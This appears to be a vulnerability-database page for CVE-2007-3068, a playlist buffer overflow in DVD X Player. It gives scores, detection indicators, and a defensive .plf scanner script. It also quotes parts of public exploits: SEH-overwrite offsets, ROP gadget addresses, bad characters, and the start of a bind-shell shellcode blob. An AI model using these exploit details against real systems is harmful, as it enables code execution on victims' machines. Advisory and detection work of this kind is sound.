CVE-2007-3068
Published: 2007-06-06

CVE-2007-3068: Stack-based buffer overflow in DVD X Player 4.1 Professional allows remote attackers to execute arbitrary code via a PLF playlist containing a long filename.
Priority: P344 · Severity: medium · CVSS 2.0 base score: 6.8
CVSS 2.0 vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
Exploit: public exploit code is indexed (see the Exploit-DB and Metasploit entries below)
EPSS: 32.95% (98.1th percentile)
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| dvd-x-player | dvd_x_player | — | — |
| dvd_x_studios | dvd_x_player | — | — |
Detection & IOCs (extracted from sources)
- bytes: SEH overwrite pattern \xeb\x06\x90\x90 (next_seh short jump) + \xdb\x2a\x60\x61 (pop/pop/ret in EPG.dll)
- bytes: egghunter egg tag \x54\x30\x30\x57\x54\x30\x30\x57 (the W00T tag doubled: W00TW00T)
- Monitor for MediaPlayerCtrl.dll (loaded by DVD X Player) performing a stack copy (rep movs) that triggers an access violation; this is indicative of the unbounded strcpy that causes the overflow.
- Detect the egghunter tag bytes W00T (\x54\x30\x30\x57) appearing twice consecutively in a .plf file; the tag is used to locate shellcode in memory.
- Alert on DVD X Player spawning unexpected child processes (e.g., cmd.exe, calc.exe); the exploit payload executes arbitrary code under the user's context.
- Look for ROP gadget addresses from EPG.dll (base around 0x6160xxxx–0x6164xxxx) and SkinScrollBar.dll (0x10011108) on the stack, indicating a DEP/ASLR bypass attempt against DVD X Player 5.5.
- The original CVE-2007-3068 targets DVD X Player 4.1 Professional; the Metasploit module and additional exploits extend coverage to DVD X Player 5.5 Pro and Standard. ROP gadget addresses and offsets differ between versions.
- The SEH overwrite exploit (17788) bypasses ASLR by relying on EPG.dll being a non-ASLR-enabled module; gadget addresses are fixed only when EPG.dll lacks ASLR.
- Bad characters for payload encoding are \x00\x0a\x0d\x1a; shellcode must avoid these bytes to survive the filename parsing in MediaPlayerCtrl.dll.
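As an added defensive example (not code from this page, from the indexed exploits, or from the Metasploit project), the following Python script scans a .plf playlist for the indicators listed above: the doubled W00T egg tag and the \xeb\x06\x90\x90 next-SEH jump bytes from the IOC list, plus any playlist entry that is oversized or carries non-printable bytes. Two assumptions are the example's own: that a .plf file is a line-oriented text playlist with one media path per line, and that a legitimate entry fits in MAX_PATH (260 bytes), since the 2007 PoC reports control of the stack at 277 bytes into the entry. The two sample playlists are constructed inline for illustration.

```python
from dataclasses import dataclass
from typing import Iterator, List, Tuple

# Byte patterns taken from the IOC section above.
EGG_TAG = b"\x54\x30\x30\x57" * 2        # "W00T" doubled: the egghunter marker
SEH_NEXT_JUMP = b"\xeb\x06\x90\x90"      # short jmp +6 over the SEH handler slot

# Assumed threshold (not from the page): a legitimate Windows path fits in MAX_PATH.
MAX_ENTRY_LEN = 260


@dataclass
class Finding:
    line_no: int      # 0 means the finding applies to the whole file
    reason: str
    detail: str


def iter_entries(data: bytes) -> Iterator[Tuple[int, bytes]]:
    """Yield (line number, entry) pairs.

    Assumption: a .plf playlist is line-oriented text with one media path per line.
    """
    for line_no, raw in enumerate(data.splitlines(), start=1):
        entry = raw.strip()
        if entry:
            yield line_no, entry


def scan_plf(data: bytes) -> List[Finding]:
    """Return every indicator found in a playlist blob (empty list = nothing suspicious)."""
    findings: List[Finding] = []

    # File-level byte signatures from the IOC list.
    if EGG_TAG in data:
        findings.append(Finding(0, "egghunter-tag", "W00TW00T marker present"))
    if SEH_NEXT_JUMP in data:
        findings.append(Finding(0, "seh-next-jump", "eb 06 90 90 sequence present"))

    # Entry-level checks: an entry long enough to reach the saved return address
    # or SEH record, and binary bytes that have no place in a text playlist.
    for line_no, entry in iter_entries(data):
        if len(entry) > MAX_ENTRY_LEN:
            findings.append(Finding(line_no, "oversized-entry", f"{len(entry)} bytes"))
        if any(b < 0x20 or b > 0x7E for b in entry if b != 0x09):
            findings.append(Finding(line_no, "non-printable-bytes", "binary data in playlist entry"))
    return findings


def is_suspicious(data: bytes) -> bool:
    return bool(scan_plf(data))


# Constructed samples: a normal two-entry playlist and one carrying a
# 300-byte entry followed by the two IOC byte patterns.
BENIGN_PLF = b"C:\\Videos\\intro.mpg\r\nD:\\DVD\\VIDEO_TS\\VTS_01_1.VOB\r\n"
SUSPICIOUS_PLF = (
    b"C:\\Videos\\intro.mpg\r\n"
    + b"A" * 300 + SEH_NEXT_JUMP + EGG_TAG + b"\r\n"
)

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN_PLF), ("suspicious", SUSPICIOUS_PLF)):
        hits = [(f.line_no, f.reason, f.detail) for f in scan_plf(blob)]
        print(f"{name}: {'SUSPICIOUS' if hits else 'clean'} {hits}")
```

Run it against a quarantined .plf (`scan_plf(open(path, "rb").read())`) before the file reaches a player; the length check is the one that matters for variants whose shellcode and gadgets differ from the indexed exploits, because every known exploit for this bug still needs an entry far longer than any real path.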
GHSA: GHSA-v6hw-hvgc-c65x: DVD X Player Standard 5 (CVE-2018-9128, MEDIUM, CWE-119) · ghsa_unreviewed · 2022-05-14 · CVSS 6.8
DVD X Player Standard 5.5.3.9 has a Buffer Overflow via a crafted .plf file, a related issue to CVE-2007-3068.
GHSA: GHSA-xh8w-m2v6-88j8: Stack-based buffer overflow in DVD X Player 4 (CVE-2007-3068, MEDIUM) · ghsa_unreviewed · 2022-05-01
Stack-based buffer overflow in DVD X Player 4.1 Professional allows remote attackers to execute arbitrary code via a PLF playlist containing a long filename.
No detection rules found.
Exploit-DB: DVD X Player 5.5 Pro - Local Overflow (SEH + ASLR + DEP Bypass) · exploitdb · 2011-09-08 · CVE-2007-3068
---
Exploit-DB: DVD X Player 5.5 Pro - Overwrite (SEH) · exploitdb · 2011-09-06 · CVE-2007-3068
---
```python
# DVD X Player 5.5 Pro
# Bypass ASLR by using non-aslr enabled module
# SEH Overwrite
# Egghunter is not needed as there is at least 2000 bytes for shellcode
import sys
print "===================================="
print "DVD X Player 5.5 Pro Buffer Overflow"
print " SEH Overwrite - Bypass ASLR "
print " Written by Blake "
print "===================================="
# size = 325 bytes
# ./msfvenom -p windows/shell/bind_tcp LPORT=8080 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x1a' -f c
shellcode=(
"\xba\x16\x44\x8a\xd1\xdb\xd1\xd9\x74\x24\xf4\x5d\x29\xc9\xb1"
"\x4b\x31\x55\x14\x83\xc5\x04\x03\x55\x10\xf4\xb1\x76\x39\x71"
"\x39\x87\xba\xe1\xb3\x62\x8b\x33\xa7\xe7\xbe\x83\xa3\xaa\x32"
"\x68\xe1\x5e\xc0\x1c\x2e\x50\x61\xaa\x08\x5f\x72\x1b\x95\x33"
```
Exploit-DB: DVD X Player 5.5 - '.plf' Playlist Buffer Overflow (Metasploit) · exploitdb · 2011-09-01 · CVE-2007-3068
---
```ruby
##
# $Id: dvdx_plf_bof.rb 13673 2011-09-01 05:20:47Z sinn3r $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

# The text between the class name and the 'Name' key was lost when this
# page was extracted (the '<' was swallowed as markup); the lines below
# restore the standard file-format module skeleton of that Metasploit release.
class Metasploit3 < Msf::Exploit::Remote

  include Msf::Exploit::FileFormat

  def initialize(info = {})
    super(update_info(info,
      'Name'           => "DVD X Player 5.5 .plf PlayList Buffer Overflow",
      'Description'    => %q{
          This module exploits a stack-based buffer overflow on DVD X Player 5.5 Pro and
          Standard. By supplying a long string of data in a plf file (playlist), the
          MediaPlayerCtrl.dll component will attempt to extract a filename out of the string,
          and then copy it on the stack without any proper bounds chec
```
Exploit-DB: DVD X Player 4.1 Professional - '.PLF' File Buffer Overflow · exploitdb · 2007-06-02 · CVE-2007-3068
---
```ruby
#!/usr/bin/env ruby
####################################################################################################
#0day DVD X Player 4.1 Professional .PLF file buffer over flow found by n00b and poc by n00b.
#First of all DVD x is prone to a buffer-overflow when playing an overly long file name inside
#A .plf file Which is InterVideo WinDVD Play list File but also Dvd x uses this file as a play
#list file.Also the seh handlers got smashed so seh over-write is possible.Upon successful
#Exploitation calc will open and if it don't make sure you have the right jmp esp%
#Tested on :win xp service pack 2
#Vendors web site: http://www.dvd-x-player.com/
#Esp was pointing 277 byte's in to the buffer.
#And eip was over written
```
Metasploit: DVD X Player 5.5 .plf PlayList Buffer Overflow
This module exploits a stack-based buffer overflow on DVD X Player 5.5 Pro and Standard. By supplying a long string of data in a plf file (playlist), the MediaPlayerCtrl.dll component will attempt to extract a filename out of the string, and then copy it on the stack without any proper bounds checking, which causes a buffer overflow, and results in arbitrary code execution under the context of the user. This module has been designed to target common Windows systems such as: Windows XP SP2/SP3, Windows Vista, and Windows 7.
No writeups or analysis indexed.
References
- http://osvdb.org/36956
- http://secunia.com/advisories/25508
- http://www.securityfocus.com/bid/24278
- http://www.vupen.com/english/advisories/2007/2043
- https://exchange.xforce.ibmcloud.com/vulnerabilities/34690
- https://www.exploit-db.com/exploits/4024